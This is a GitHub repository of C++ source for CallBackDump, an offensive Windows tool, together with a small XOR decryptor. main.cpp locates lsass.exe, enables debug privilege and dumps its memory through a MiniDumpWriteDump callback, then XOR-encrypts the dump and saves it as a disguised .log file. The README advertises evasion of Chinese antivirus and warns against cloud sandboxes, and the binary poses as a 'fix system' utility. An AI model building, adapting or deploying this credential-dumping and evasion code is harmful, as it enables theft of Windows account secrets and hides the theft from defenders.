Repository: seventeenman/CallBackDump
Branch: main
Commit: d4ac4564e74f
Files: 15
Total size: 29.2 KB
Directory structure:
gitextract_e5ddyv_y/
├── CallbackDump/
│ ├── CallbackDump/
│ │ ├── CallbackDump.aps
│ │ ├── CallbackDump.rc
│ │ ├── CallbackDump.vcxproj
│ │ ├── CallbackDump.vcxproj.filters
│ │ ├── CallbackDump.vcxproj.user
│ │ ├── global.h
│ │ ├── main.cpp
│ │ └── resource.h
│ └── CallbackDump.sln
├── README.md
└── dumpXor/
├── dumpXor/
│ ├── dumpXor.vcxproj
│ ├── dumpXor.vcxproj.filters
│ ├── dumpXor.vcxproj.user
│ └── main.cpp
└── dumpXor.sln
================================================
FILE CONTENTS
================================================
================================================
FILE: CallbackDump/CallbackDump/CallbackDump.rc
================================================
// Microsoft Visual C++ generated resource script.
//
#include "resource.h"
#define APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 2 resource.
//
#include "winres.h"
/////////////////////////////////////////////////////////////////////////////
#undef APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
// (壬й) resources
#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)
LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
#pragma code_page(936)
#ifdef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// TEXTINCLUDE
//
1 TEXTINCLUDE
BEGIN
"resource.h\0"
END
2 TEXTINCLUDE
BEGIN
"#include ""winres.h""\r\n"
"\0"
END
3 TEXTINCLUDE
BEGIN
"\r\n"
"\0"
END
#endif // APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// Version
//
VS_VERSION_INFO VERSIONINFO
FILEVERSION 2,1,6,6
PRODUCTVERSION 2,1,6,6
FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
FILEFLAGS 0x1L
#else
FILEFLAGS 0x0L
#endif
FILEOS 0x40004L
FILETYPE 0x1L
FILESUBTYPE 0x0L
BEGIN
BLOCK "StringFileInfo"
BEGIN
BLOCK "080404b0"
BEGIN
VALUE "CompanyName", "system"
VALUE "FileDescription", "system"
VALUE "FileVersion", "2.1.6.6"
VALUE "InternalName", "fixSystem.exe"
VALUE "LegalCopyright", "Copyright (C) 2022"
VALUE "OriginalFilename", "Callback.exe"
VALUE "ProductName", "fix system"
VALUE "ProductVersion", "2.1.6.6"
END
END
BLOCK "VarFileInfo"
BEGIN
VALUE "Translation", 0x804, 1200
END
END
#endif // (壬й) resources
/////////////////////////////////////////////////////////////////////////////
#ifndef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 3 resource.
//
/////////////////////////////////////////////////////////////////////////////
#endif // not APSTUDIO_INVOKED
================================================
FILE: CallbackDump/CallbackDump/CallbackDump.vcxproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{ae20b179-5a3a-4aa9-96fa-acccb1c721e5}</ProjectGuid>
<RootNamespace>CallbackDump</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BufferSecurityCheck>false</BufferSecurityCheck>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>false</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="main.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="global.h" />
<ClInclude Include="resource.h" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="CallbackDump.rc" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
================================================
FILE: CallbackDump/CallbackDump/CallbackDump.vcxproj.filters
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="源文件">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="头文件">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="资源文件">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.cpp">
<Filter>源文件</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="global.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="resource.h">
<Filter>头文件</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="CallbackDump.rc">
<Filter>资源文件</Filter>
</ResourceCompile>
</ItemGroup>
</Project>
================================================
FILE: CallbackDump/CallbackDump/CallbackDump.vcxproj.user
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>
================================================
FILE: CallbackDump/CallbackDump/global.h
================================================
#pragma once
typedef NTSTATUS(WINAPI* _RtlAdjustPrivilege)(
ULONG Privilege, BOOL Enable,
BOOL CurrentThread, PULONG Enabled);
_RtlAdjustPrivilege MRtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(
GetModuleHandleW(L"ntdll.dll"), "RtlAdjustPrivilege");
typedef LPVOID(WINAPI* _HeapAlloc)(
HANDLE hHeap , DWORD dwFlags,
SIZE_T dwBytes);
_HeapAlloc MHeapAlloc = (_HeapAlloc)GetProcAddress(
GetModuleHandleW(L"Kernel32.dll"), "HeapAlloc");
typedef HANDLE(WINAPI* _CreateToolhelp32Snapshot)(
DWORD dwFlags, DWORD th32ProcessID);
_CreateToolhelp32Snapshot MCreateToolhelp32Snapshot = (_CreateToolhelp32Snapshot)GetProcAddress(
GetModuleHandleW(L"Kernel32.dll"), "CreateToolhelp32Snapshot");
typedef BOOL(WINAPI* _Process32FirstW)(
HANDLE hSnapshot, LPPROCESSENTRY32W lppe);
_Process32FirstW MProcess32FirstW = (_Process32FirstW)GetProcAddress(
GetModuleHandleW(L"Kernel32.dll"), "Process32FirstW");
typedef BOOL(WINAPI* _Process32NextW)(
HANDLE hSnapshot, LPPROCESSENTRY32W lppe);
_Process32NextW MProcess32NextW = (_Process32NextW)GetProcAddress(
GetModuleHandleW(L"Kernel32.dll"), "Process32NextW");
typedef HANDLE(WINAPI* _OpenProcess)(
DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
_OpenProcess MOpenProcess = (_OpenProcess)GetProcAddress(
GetModuleHandleW(L"Kernel32.dll"), "OpenProcess");
typedef BOOL(WINAPI* _MiniDumpWriteDump)(
HANDLE hProcess, DWORD ProcessId,
HANDLE hFile, MINIDUMP_TYPE DumpType,
PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam,
PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
PMINIDUMP_CALLBACK_INFORMATION CallbackParam);
_MiniDumpWriteDump MMiniDumpWriteDump = (_MiniDumpWriteDump)GetProcAddress(
LoadLibraryA("Dbghelp.dll"), "MiniDumpWriteDump");
extern char * Xorcrypt(char* content, DWORD length ,char* secretKey)
{
for (UINT i = 0; i < length; i++)
{
content[i] ^= secretKey[i % sizeof(secretKey)];
}
return content;
}
================================================
FILE: CallbackDump/CallbackDump/main.cpp
================================================
#include <windows.h>
#include <DbgHelp.h>
#include <iostream>
#include <TlHelp32.h>
#include <processsnapshot.h>
#pragma comment (lib, "Dbghelp.lib")
#include "global.h"
// Buffer for saving the minidump
LPVOID buffer = MHeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 1024 * 1024 * 75);
DWORD bytesRead = 0;
BOOL CALLBACK minidumpCallback(
__in PVOID callbackParam,
__in const PMINIDUMP_CALLBACK_INPUT callbackInput,
__inout PMINIDUMP_CALLBACK_OUTPUT callbackOutput
)
{
LPVOID destination = 0, source = 0;
DWORD bufferSize = 0;
switch (callbackInput->CallbackType)
{
case IoStartCallback:
callbackOutput->Status = S_FALSE;
break;
// Gets called for each lsass process memory read operation
case IoWriteAllCallback:
callbackOutput->Status = S_OK;
// A chunk of minidump data that's been jus read from lsass.
// This is the data that would eventually end up in the .dmp file on the disk, but we now have access to it in memory, so we can do whatever we want with it.
// We will simply save it to dumpBuffer.
source = callbackInput->Io.Buffer;
// Calculate location of where we want to store this part of the dump.
// Destination is start of our dumpBuffer + the offset of the minidump data
destination = (LPVOID)((DWORD_PTR)buffer + (DWORD_PTR)callbackInput->Io.Offset);
// Size of the chunk of minidump that's just been read.
bufferSize = callbackInput->Io.BufferBytes;
bytesRead += bufferSize;
RtlCopyMemory(destination, source, bufferSize);
break;
case IoFinishCallback:
callbackOutput->Status = S_OK;
break;
default:
return true;
}
return TRUE;
}
void nt_wait(DWORD milliseconds)
{
static NTSTATUS(__stdcall * NtDelayExecution)(BOOL Alertable, PLARGE_INTEGER DelayInterval) = (NTSTATUS(__stdcall*)(BOOL, PLARGE_INTEGER)) GetProcAddress(GetModuleHandleA(("ntdll.dll")), ("NtDelayExecution"));
static NTSTATUS(__stdcall * ZwSetTimerResolution)(IN ULONG RequestedResolution, IN BOOLEAN Set, OUT PULONG ActualResolution) = (NTSTATUS(__stdcall*)(ULONG, BOOLEAN, PULONG)) GetProcAddress(GetModuleHandleA(("ntdll.dll")), ("ZwSetTimerResolution"));
static bool once = true;
if (once && ZwSetTimerResolution != NULL) {
ULONG actualResolution;
ZwSetTimerResolution(1, true, &actualResolution);
once = false;
}
LARGE_INTEGER interval;
interval.QuadPart = -1 * (int)(milliseconds * 10000);
if (NtDelayExecution != NULL)
{
NtDelayExecution(false, &interval);
}
}
int main(int argc, char* argv[]) {
if (__argc == 1) {
return 7899 * 1777;
}
else if (__argc == 2) {
if (strcmp(__argv[1], "to") != 0)
{
return 7 * 12899;
}
}
else {
return 1717 * 1888;
}
nt_wait(10000);
DWORD PID = 0;
DWORD bytesWritten = 0;
HANDLE lHandle = NULL;
HANDLE snapshot = MCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
LPCWSTR processName = L"";
PROCESSENTRY32 processEntry = {};
processEntry.dwSize = sizeof(PROCESSENTRY32);
ULONG t;
// Get lsass PID
if (MProcess32FirstW(snapshot, &processEntry)) {
while (_wcsicmp(processName, L"lsass.exe") != 0) {
MProcess32NextW(snapshot, &processEntry);
processName = processEntry.szExeFile;
PID = processEntry.th32ProcessID;
}
}
// enable debug privilege
MRtlAdjustPrivilege(20, TRUE, FALSE, &t);
lHandle = MOpenProcess(PROCESS_ALL_ACCESS, 0, PID);
// Set up minidump callback
MINIDUMP_CALLBACK_INFORMATION callbackInfo;
ZeroMemory(&callbackInfo, sizeof(MINIDUMP_CALLBACK_INFORMATION));
callbackInfo.CallbackRoutine = &minidumpCallback;
callbackInfo.CallbackParam = NULL;
// Dump lsass
BOOL isD = MMiniDumpWriteDump(lHandle, PID, NULL, MiniDumpWithFullMemory, NULL, NULL, &callbackInfo);
if (isD)
{
long int size = bytesRead;
char *securitySth = new char[size];
char *key = (char *)"thisisgood";
memcpy(securitySth,buffer,bytesRead);
securitySth = Xorcrypt(securitySth, bytesRead, key);
// At this point, we have the lsass dump in memory at location dumpBuffer - we can do whatever we want with that buffer, i.e encrypt & exfiltrate
HANDLE outFile = CreateFile(L"C:\\Users\\Public\\Downloads\\VM21-6-8.log", GENERIC_ALL, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
//// For testing purposes, let's write lsass dump to disk from our own dumpBuffer and check if mimikatz can work it
if (WriteFile(outFile, securitySth, bytesRead, &bytesWritten, NULL))
{
printf("\n[+] to C:\\Users\\Public\\Downloads\\VM21-6-8.log\n");
}
CloseHandle(outFile);
}
return 0;
}
================================================
FILE: CallbackDump/CallbackDump/resource.h
================================================
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by CallbackDump.rc
// ¶һĬֵ
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 101
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1001
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
================================================
FILE: CallbackDump/CallbackDump.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.3.32825.248
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CallbackDump", "CallbackDump\CallbackDump.vcxproj", "{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Debug|x64.ActiveCfg = Debug|x64
{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Debug|x64.Build.0 = Debug|x64
{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Debug|x86.ActiveCfg = Debug|Win32
{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Debug|x86.Build.0 = Debug|Win32
{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Release|x64.ActiveCfg = Release|x64
{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Release|x64.Build.0 = Release|x64
{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Release|x86.ActiveCfg = Release|Win32
{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {61DC3699-9F4E-4BF9-AB81-CCAF773B4ADA}
EndGlobalSection
EndGlobal
================================================
FILE: README.md
================================================
# CallBackDump
能过国内杀软的dump lsass进程工具,参考代码链接在下面。
由minidumpCallback实现,对缓冲区中内存做了些修改后再写入磁盘,同时做了一些小细节修改。
需要注意的是别扔云沙箱,这工具也没有任何网络行为。
# 环境
VS2022
# 用法
`CallbackDump.exe to` 将lsass进程dump成VM21-6-8.log
`dumpXor.exe VM21-6-8.log 1.bin` 将加密的进程文件解密
# 详解
[Dumping Lsass Process Memory In Different Ways - 跳跳糖](https://tttang.com/archive/1810/)
# 参考链接
https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
================================================
FILE: dumpXor/dumpXor/dumpXor.vcxproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{9cc63db2-7fc6-4d54-a0e4-cd91e124bfd4}</ProjectGuid>
<RootNamespace>dumpXor</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BufferSecurityCheck>false</BufferSecurityCheck>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>false</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="main.cpp" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
================================================
FILE: dumpXor/dumpXor/dumpXor.vcxproj.filters
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="源文件">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="头文件">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="资源文件">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.cpp">
<Filter>源文件</Filter>
</ClCompile>
</ItemGroup>
</Project>
================================================
FILE: dumpXor/dumpXor/dumpXor.vcxproj.user
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>
================================================
FILE: dumpXor/dumpXor/main.cpp
================================================
#include <stdio.h>
int main(int argc, char* argv[]) {
int keylen, index = 0;
char* source, * dest, fBuffer[1], tBuffer[20], ckey;
FILE* fSource, * fDest;
source = argv[1]; // ԭļ
dest = argv[2]; // Ŀļ
char* key = (char*)"thisisgood";
// ȡkey
keylen = sizeof(key);
fSource = fopen(source, "rb");
fDest = fopen(dest, "wb");
while (!feof(fSource)) {
fread(fBuffer, 1, 1, fSource); // ȡ1ֽ
if (!feof(fSource)) {
ckey = key[index % keylen]; // ѭȡkey
*fBuffer = *fBuffer ^ ckey; // xor encrypt
fwrite(fBuffer, 1, 1, fDest); // дļ
index++;
}
}
fclose(fSource);
fclose(fDest);
}
================================================
FILE: dumpXor/dumpXor.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.3.32825.248
